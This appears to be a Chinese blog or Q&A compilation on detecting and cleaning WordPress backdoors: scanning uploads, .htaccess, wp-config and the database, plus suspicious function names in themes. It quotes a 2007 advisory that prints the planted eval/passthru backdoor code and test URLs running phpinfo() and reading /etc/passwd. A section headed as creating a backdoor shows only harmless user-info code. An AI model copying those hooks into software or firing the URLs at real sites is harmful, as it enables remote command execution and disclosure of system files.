至此我们已经知道了后门程序一般会隐藏在哪里，那么现在开始要设法找到他们，然后清除他们像删除任何一个文件一样简单，但是难度就在于如何没有遗漏的找到他们，这里给大家介绍一款不错的恶意代码扫描软件，当然是收费的，大家可以有个参考，Sucuri。

你也可以使用 Exploit Scanner插件来扫描。

搜索 Uploads 目录

如果你对SSH命令行熟悉的话，可以通过SSH登陆进去，然后执行以下命令行：

1

find uploads -name "*.php" -print

通过以上命令行扫描出任何.php的文件都是可疑文件，因为Uploads目录不应该有任何.php的文件存在，所以尽管删除这些可疑的文件就是了。

删除任何没启用的模版文件

.htaccess 文件

有时候一些跳转代码被加入到了.htaccess文件，仅仅删除那些后门程序文件并没有用，一会就通过.htaccess文件重建出来了，因此需要在这个文件中彻底清除不该存在的代码。

wp-config.php 文件

将这个文件与 wp-config-sample.php 作对比，删除任何除了自己确认有用的多余的代码。

数据库扫描

厉害的黑客一般都会用多种方式来隐藏他们的行踪，而数据库则是一个非常好的场所，他们可以存储破坏性的PHP函数，隐藏的管理员账号，恶意链接等等，当然如果你不够熟悉SQL，那么上边介绍过的Sucuri将是你不错的选择，尽管付费，但是相信恢复你被黑的站点值得这点付出。

至此你可能觉得已经彻底清除干净了，别高兴太早了，试试打开一个浏览器，确保你站点未登陆状态下打开站点看看是否恶意代码还会回来？因为好多聪明的黑客很巧妙的让这些恶意代码对登陆过的用户隐身，而只对未登陆访客有效，这样好多时候让时刻在线的管理员无处查找。

如何给wordpress创建一个后门

先判断下是否登录，然后获取当前用户对象，然后获取当前用户对象的信息，需要哪些用哪些：

if(is_user_logged_in()){

$current_user = wp_get_current_user();

/**

* @example Safe usage: $current_user = wp_get_current_user();

* if ( !($current_user instanceof WP_User) )

* return;

*/

echo 'Username: ' . $current_user->user_login . '<br />';

echo 'User email: ' . $current_user->user_email . '<br />';

echo 'User first name: ' . $current_user->user_firstname . '<br />';

echo 'User last name: ' . $current_user->user_lastname . '<br />';

echo 'User display name: ' . $current_user->display_name . '<br />';

echo 'User ID: ' . $current_user->ID . '<br />';

}

检测wordpress主题是否有后门

第一种使用工具检测（插件检测）主题方法：

安装插件方法：

wordpress后台——外观——TAC——启动Theme Authenticity Checker安全检测插件

然后就会自动检测，如果出现全部为绿色，则表示没有任何后门

如果有异常请点击Details产看，并按照路径进行相关处理

第二种使用手动检测主题方法：

使用ftp工具查看源码:找到fuctions.php这个文件

查看是否包含以下函数：

function __popular_posts

function stripos

function scandir

function _getprepare_widget

add_action("init", "_getprepare_widget");

function _get_allwidgets_cont

function strripos

function _checkactive_widgets

add_action("admin_head", "_checkactive_widgets");

3

第三种使用文件同步对比法检测主题方法：

首先在wordpress官网下载跟你源码相同版本的代码

找到下载源码中的fuctions.php与你的程序源码的fuctions.php进行对比

对比的时候请注意，如果对比出现红色的可以询问相关技术人员，或者在网上进行搜索

对比推荐使用软件Beyond Compare 4点击进行文本对比即可

wordpress主题存在后门恶意代码该怎么办

找出代码删除

如果你知道主题存在后门的话 那么我相信你对于代码还是有点了解的

BanYuner回复

检测wordpress主题是否有后门

http://zhuji.360.cn/backdoor/ 用这个可以查wordpress主题是否有后门

如何检测WordPress主题是否有后门

检测WordPress主题是否有后门方法详见：https://jingyan.baidu.com/article/7c6fb4281fa75580652c9049.html

Wordpress 2.1.1远程命令执行后门漏洞

他受影响系统是：

WordPress WordPress 2.1.1

描述：

BUGTRAQ ID: 22797

WordPress是一款免费的论坛Blog系统。

WordPress提供软件下载的网站被入侵，入侵者修改了软件代码码植入远程可执行命令的后门，远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。

被修改的文件是wp-includes/feed.php和wp-includes/theme.php，被添加了如下代码：

在wp-includes/feed.php文件中：

function comment_text_phpfilter($filterdata) {

eval($filterdata);

}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

eval()调用会执行通过ix变量传入的PHP代码。

在wp-includes/theme.php文件中：

function get_theme_mcommand($mcds) {

passthru($mcds);

}

...

if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

passthru()会执行通过iz变量传入的PHP代码。

<*来源：Ivan Fratric

链接：http://secunia.com/advisories/24374/

http://wordpress.org/development/2007/03/upgrade-212/

http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.html

*>

测试方法：

--------------------------------------------------------------------------------

提示：

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://wordpressurl/wp-includes/feed.php?ix=phpinfo()

http://wordpressurl/wp-includes/theme.php?iz=cat/etc/passwd

现在有哪些必备的 wordpress 插件

为了安全，尽量少安装些插件，要使用来路正规的主题，现在很多插件和主题中都有后门，不要的插件和主题都删掉不要放在空间里

转载请注明出处51数据库 » wordpress后门 怎么查找wordpress后门